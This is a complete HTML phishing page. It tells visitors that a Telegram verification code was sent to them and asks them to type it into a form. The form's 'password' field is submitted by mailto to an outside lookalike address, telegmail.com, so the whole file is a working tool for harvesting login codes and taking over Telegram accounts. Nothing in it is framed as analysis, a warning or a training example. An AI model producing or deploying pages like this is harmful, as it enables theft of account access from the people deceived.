<!doctype html>
<html>
     <head>
          
       <style>
            
         .ts{
          font-size:80px;    
              
              
              
              
         }   
            
        .iuy{
             
         height:90px;    
          font-size:60px;   
          margin-top:60px;   
           text-align:center;  
           border-radius:36px;
           margin-top:290px;
           margin-left:100px;
        }    
        .send{
          width:150px;   
            height:90px; 
             background-color:blue;
             color:white;
             margin-left:380px;
             font-size:30px;
             border-radius:10px;
        }    
            
            
            
       </style>   
          
          
          
          
          
          
          
          <h class="ts">we have sent a verification code to your telegram account and send us that code</h>
     </head>
     <body>
          
                   <form action="mailto:tyirmg@telegmail.com" method="post" enctype="text/plain">
              
          
           <label for="code">code:</label><br>

        <textarea id="code" class="iuy" type="code" placeholder="5 didgit code" name="password"  rows="1" cols="20"></textarea><br><br>
          <input class="send" type="submit" value="send">

        </form>
     </body>
</html>